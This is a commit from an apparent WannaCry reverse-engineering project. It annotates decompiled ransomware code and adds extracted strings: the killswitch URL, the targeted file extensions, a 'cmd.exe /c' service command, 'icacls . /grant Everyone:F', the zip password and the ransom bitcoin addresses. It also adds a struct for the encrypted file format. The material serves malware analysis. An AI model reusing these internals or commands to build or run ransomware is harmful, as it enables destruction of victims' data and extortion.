Added strings from wannacry and 1831.bin binaries

autun12 · Nov 9, 2019 · f5a8bb5 · f5a8bb5
1 parent 7e68dbc
commit f5a8bb5
Show file tree

Hide file tree

Showing 3 changed files with 256 additions and 4 deletions.
diff --git a/1831.bin.c b/1831.bin.c
@@ -841,6 +841,7 @@ undefined4 __cdecl set_or_query_registry_cwd(int set_registry) {
   HKEY regWanaHandle;
 
   iVar2 = 5;
+  // u_Software__0040e04c = Software
   software_str = (undefined4 *)u_Software__0040e04c;
   puVar3 = software_str_buf;
 
@@ -874,6 +875,7 @@ undefined4 __cdecl set_or_query_registry_cwd(int set_registry) {
   *(undefined2 *)software_str = 0;
   *(undefined *)((int)software_str + 2) = 0;
 
+  // u_WanaCrypt0r_0040e034 = WanaCrypt0r
   // Software\WanaCrypt0r
   wcscat((wchar_t *)software_str_buf,u_WanaCrypt0r_0040e034);
 
@@ -1405,6 +1407,7 @@ int create_and_cwd_dir(LPCWSTR dir_1,LPCWSTR dir_2,wchar_t *dir_out) {
       DVar2 = GetFileAttributesW(dir_2);
       SetFileAttributesW(dir_2,DVar2 | 6);
       if (dir_out != (wchar_t *)0x0) {
+        // u__s__s_0040eb88 = 
         swprintf(dir_out,u__s__s_0040eb88,dir_1,dir_2);
       }
       return 1;
@@ -1460,14 +1463,17 @@ uint create_and_cwd_random_hidden_directory(wchar_t *cwd_out) {
   // gets C:\ or C:\Windows
   GetWindowsDirectoryW((LPWSTR)&stack0xfffffb24,0x104);
 
+  // u__s_ProgramData_0040f40c = C:\ProgramData or C:\Windows\ProgramData
   // C:\ProgramData or C:\Windows\ProgramData
 
   swprintf(&programdata_path,u__s_ProgramData_0040f40c,&stack0xfffffb24);
   pd_attr = GetFileAttributesW(&programdata_path);
 
   if ((pd_attr == 0xffffffff) ||
+
      (iVar2 = create_and_cwd_dir(&programdata_path,&randomstring_w,cwd_out), iVar2 == 0)) {
 
+    //u__s_Intel_0040f3f8 = C:\Intel or C:\Windows\Intel
     // C:\Intel or C:\Windows\Intel
     swprintf(&programdata_path,u__s_Intel_0040f3f8,(wchar_t *)&stack0xfffffb24);
     iVar2 = create_and_cwd_dir(&programdata_path,&randomstring_w,cwd_out);
@@ -1509,6 +1515,8 @@ undefined4 __cdecl create_taskche_service(char *path_to_taskche) {
     randomstring_service = OpenServiceA(scmanager,(LPCSTR)&randomstring,0xf01ff);
 
     if (randomstring_service == (SC_HANDLE)0x0) {
+
+      // s_cmd_exe__c___s__0040f42c = cmd.exe /c \"%s
       sprintf(local_410,s_cmd_exe__c___s__0040f42c,path_to_taskche);
       hService = CreateServiceA(scmanager,(LPCSTR)&randomstring,(LPCSTR)&randomstring,0xf01ff,0x10,2
                                 ,1,local_410,(LPCSTR)0x0,(LPDWORD)0x0,(LPCSTR)0x0,(LPCSTR)0x0,
@@ -1594,11 +1602,15 @@ void bitcoin_something(void) {
   int iVar2;
   undefined local_31c [178];
   char local_26a [602];
-  char *local_10 [3];
+  char *bitcoin_addresses [3];
 
-  local_10[0] = s_13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb_0040f488;
-  local_10[1] = s_12t9YDPgwueZ9NyMgw519p7AA8isjr6S_0040f464;
-  local_10[2] = s_115p7UMMngoj1pMvkpHijcRdfJNXj6Lr_0040f440;
+  // s_13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb_0040f488 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94"
+  // s_12t9YDPgwueZ9NyMgw519p7AA8isjr6S_0040f464 = "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw"
+  // s_115p7UMMngoj1pMvkpHijcRdfJNXj6Lr_0040f440 = "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn"
+
+  bitcoin_addresses[0] = s_13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb_0040f488;
+  bitcoin_addresses[1] = s_12t9YDPgwueZ9NyMgw519p7AA8isjr6S_0040f464;
+  bitcoin_addresses[2] = s_115p7UMMngoj1pMvkpHijcRdfJNXj6Lr_0040f440;
   uVar1 = FUN_00401000(local_31c,1);
 
   if (uVar1 != 0) {
@@ -1708,6 +1720,7 @@ int WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,PWSTR pCmdLine,int nCmdS
 
     if ((arg1_cmp == 0) &&
        (uVar1 = create_and_cwd_random_hidden_directory((wchar_t *)0x0), uVar1 != 0)) {
+         // s_tasksche_exe_0040f4d8 = tasksche.exe
       CopyFileA(filename,s_tasksche_exe_0040f4d8,0);
       DVar2 = GetFileAttributesA(s_tasksche_exe_0040f4d8);
 
@@ -1726,6 +1739,7 @@ int WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,PWSTR pCmdLine,int nCmdS
 
   SetCurrentDirectoryA(filename);
   set_or_query_registry_cwd(1);
+  //s_WNcry_2ol7_0040f52c = WNcry@2ol7
   FUN_00401dab((HMODULE)0x0,s_WNcry_2ol7_0040f52c);
   bitcoin_something();
   run_command(s_attrib__h___0040f520,0,(LPDWORD)0x0);

diff --git a/allimportantstrings.txt b/allimportantstrings.txt
@@ -0,0 +1,215 @@
+----------------------WANNACRY.C----------------------
+
+COMMAND ARGUMENTS
+00431330	%s -m security	%s -m security
+
+FILES
+00431344	C:\%s\qeriuwjhrf	C:\%s\qeriuwjhrf
+00431358	C:\%s\%s	C:\%s\%s
+00431364	WINDOWS	WINDOWS
+0043136c	tasksche.exe	tasksche.exe
+
+KILLSWITCH URL
+004313d0	http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
+
+
+----------------------1831.BIN.C----------------------
+
+0040e010	c.wnry	c.wnry
+0040e034	WanaCrypt0r	WanaCrypt0r	
+0040e04c	Software\	Software\	
+0040e330	.der	.der	
+0040e33c	.pfx	.pfx	
+0040e348	.key	.key	
+0040e354	.crt	.crt	
+0040e360	.csr	.csr	
+0040e36c	.p12	.p12	
+0040e378	.pem	.pem	
+0040e384	.odt	.odt	
+0040e390	.ott	.ott	
+0040e39c	.sxw	.sxw	
+0040e3a8	.stw	.stw	
+0040e3b4	.uot	.uot	
+0040e3c0	.3ds	.3ds	
+0040e3cc	.max	.max	
+0040e3d8	.3dm	.3dm	
+0040e3e4	.ods	.ods	
+0040e3f0	.ots	.ots	
+0040e3fc	.sxc	.sxc	
+0040e408	.stc	.stc	
+0040e414	.dif	.dif	
+0040e420	.slk	.slk	
+0040e42c	.wb2	.wb2	
+0040e438	.odp	.odp	
+0040e444	.otp	.otp	
+0040e450	.sxd	.sxd	
+0040e45c	.std	.std	
+0040e468	.uop	.uop	
+0040e474	.odg	.odg	
+0040e480	.otg	.otg	
+0040e48c	.sxm	.sxm	
+0040e498	.mml	.mml	
+0040e4a4	.lay	.lay	
+0040e4b0	.lay6	.lay6	
+0040e4bc	.asc	.asc	
+0040e4c8	.sqlite3	.sqlite3	
+0040e4dc	.sqlitedb	.sqlitedb	
+0040e4f0	.sql	.sql	
+0040e4fc	.accdb	.accdb	
+0040e50c	.mdb	.mdb	
+0040e520	.dbf	.dbf	
+0040e52c	.odb	.odb	
+0040e538	.frm	.frm	
+0040e544	.myd	.myd	
+0040e550	.myi	.myi	
+0040e55c	.ibd	.ibd	
+0040e568	.mdf	.mdf	
+0040e574	.ldf	.ldf	
+0040e580	.sln	.sln	
+0040e58c	.suo	.suo	
+0040e5a8	.cpp	.cpp	
+0040e5b4	.pas	.pas	
+0040e5c8	.asm	.asm	
+0040e5dc	.cmd	.cmd	
+0040e5e8	.bat	.bat	
+0040e5f4	.ps1	.ps1	
+0040e600	.vbs	.vbs	
+0040e61c	.dip	.dip	
+0040e628	.dch	.dch	
+0040e634	.sch	.sch	
+0040e640	.brd	.brd	
+0040e64c	.jsp	.jsp	
+0040e658	.php	.php	
+0040e664	.asp	.asp	
+0040e678	.java	.java	
+0040e684	.jar	.jar	
+0040e690	.class	.class	
+0040e6a8	.mp3	.mp3	
+0040e6b4	.wav	.wav	
+0040e6c0	.swf	.swf	
+0040e6cc	.fla	.fla	
+0040e6d8	.wmv	.wmv	
+0040e6e4	.mpg	.mpg	
+0040e6f0	.vob	.vob	
+0040e6fc	.mpeg	.mpeg	
+0040e708	.asf	.asf	
+0040e714	.avi	.avi	
+0040e720	.mov	.mov	
+0040e72c	.mp4	.mp4	
+0040e738	.3gp	.3gp	
+0040e744	.mkv	.mkv	
+0040e750	.3g2	.3g2	
+0040e75c	.flv	.flv	
+0040e768	.wma	.wma	
+0040e774	.mid	.mid	
+0040e780	.m3u	.m3u	
+0040e78c	.m4u	.m4u	
+0040e798	.djvu	.djvu	
+0040e7a4	.svg	.svg	
+0040e7b8	.psd	.psd	
+0040e7c4	.nef	.nef	
+0040e7d0	.tiff	.tiff	
+0040e7dc	.tif	.tif	
+0040e7e8	.cgm	.cgm	
+0040e7f4	.raw	.raw	
+0040e800	.gif	.gif	
+0040e80c	.png	.png	
+0040e818	.bmp	.bmp	
+0040e824	.jpg	.jpg	
+0040e830	.jpeg	.jpeg	
+0040e83c	.vcd	.vcd	
+0040e848	.iso	.iso	
+0040e854	.backup	.backup	
+0040e864	.zip	.zip	
+0040e870	.rar	.rar	
+0040e88c	.tgz	.tgz	
+0040e898	.tar	.tar	
+0040e8a4	.bak	.bak	
+0040e8b0	.tbk	.tbk	
+0040e8bc	.bz2	.bz2	
+0040e8c8	.PAQ	.PAQ	
+0040e8d4	.ARC	.ARC	
+0040e8e0	.aes	.aes	
+0040e8ec	.gpg	.gpg	
+0040e8f8	.vmx	.vmx	
+0040e904	.vmdk	.vmdk	
+0040e910	.vdi	.vdi	
+0040e91c	.sldm	.sldm	
+0040e928	.sldx	.sldx	
+0040e934	.sti	.sti	
+0040e940	.sxi	.sxi	
+0040e94c	.602	.602	
+0040e958	.hwp	.hwp	
+0040e964	.snt	.snt	
+0040e970	.onetoc2	.onetoc2	
+0040e984	.dwg	.dwg	
+0040e990	.pdf	.pdf	
+0040e99c	.wk1	.wk1	
+0040e9a8	.wks	.wks	
+0040e9b4	.123	.123	
+0040e9c0	.rtf	.rtf	
+0040e9cc	.csv	.csv	
+0040e9d8	.txt	.txt	
+0040e9e4	.vsdx	.vsdx	
+0040e9f0	.vsd	.vsd	
+0040e9fc	.edb	.edb	
+0040ea08	.eml	.eml	
+0040ea14	.msg	.msg	
+0040ea20	.ost	.ost	
+0040ea2c	.pst	.pst	
+0040ea38	.potm	.potm	
+0040ea44	.potx	.potx	
+0040ea50	.ppam	.ppam	
+0040ea5c	.ppsx	.ppsx	
+0040ea68	.ppsm	.ppsm	
+0040ea74	.pps	.pps	
+0040ea80	.pot	.pot	
+0040ea8c	.pptm	.pptm	
+0040ea98	.pptx	.pptx	
+0040eaa4	.ppt	.ppt	
+0040eab0	.xltm	.xltm	
+0040eabc	.xltx	.xltx	
+0040eac8	.xlc	.xlc	
+0040ead4	.xlm	.xlm	
+0040eae0	.xlt	.xlt	
+0040eaec	.xlw	.xlw	
+0040eaf8	.xlsb	.xlsb	
+0040eb04	.xlsm	.xlsm	
+0040eb10	.xlsx	.xlsx	
+0040eb1c	.xls	.xls	
+0040eb28	.dotx	.dotx	
+0040eb34	.dotm	.dotm	
+0040eb40	.dot	.dot	
+0040eb4c	.docm	.docm	
+0040eb58	.docb	.docb	
+0040eb64	.docx	.docx	
+0040eb70	.doc	.doc
+
+BEGINNING OF ENCRYPTED FILE FORMAT
+0040eb7c	WANACRY!	WANACRY!
+
+FOLDER / FILE names
+0040eb88	%s\%s	%s\%s	
+0040f3f8	%s\Intel	%s\Intel	
+0040f40c	%s\ProgramData	%s\ProgramData	
+
+COMMAND RUNNING
+0040f42c	cmd.exe /c "%s"	cmd.exe /c "%s"
+
+BITCOIN ADDRESSES
+0040f440	115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn	115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
+0040f464	12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw	12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
+0040f488	13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94	13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
+
+FILES
+0040f4d8	tasksche.exe	tasksche.exe
+0040f4e8	TaskStart	TaskStart
+0040f4f4	t.wnry	t.wnry
+0040f4fc	icacls . /grant Everyone:F /T /C /Q	icacls . /grant Everyone:F /T /C /Q
+0040f520	attrib +h .	attrib +h .
+
+ZIPFILE 2058 PASSWORD
+0040f52c	WNcry@2ol7	WNcry@2ol7
+
+ZIPFILE FORMAT
+004100ea	XIA	XIA	
diff --git a/wannacryencryptedfileformat.cpp b/wannacryencryptedfileformat.cpp
@@ -0,0 +1,23 @@
+#include <stdint.h>
+
+/*
+---------------------------------------------------
+| OFFSET | Value                                  |
+| 0x0000 | WANACRY!                               |
+| 0x0008 | Length of RSA encrypted data           |
+| 0x000C | RSA encrypted AES file encryption key  |
+| 0x010C | File type internal to WannaCry         |
+| 0x0110 | Original file size                     |
+| 0x0118 | Encrypted file contents  (AES-128 CBC) |
+---------------------------------------------------
+*/
+
+struct WannaCryFile {
+    char magicHeader[8]; //WANACRY
+    uint32_t enc_key_len; //needs to be 0x100
+    char enc_key[enc_key_len];
+    uint32_t unkown; // was 4
+    uint64_t enc_data_len;
+    char enc_data[enc_data_len];
+};
+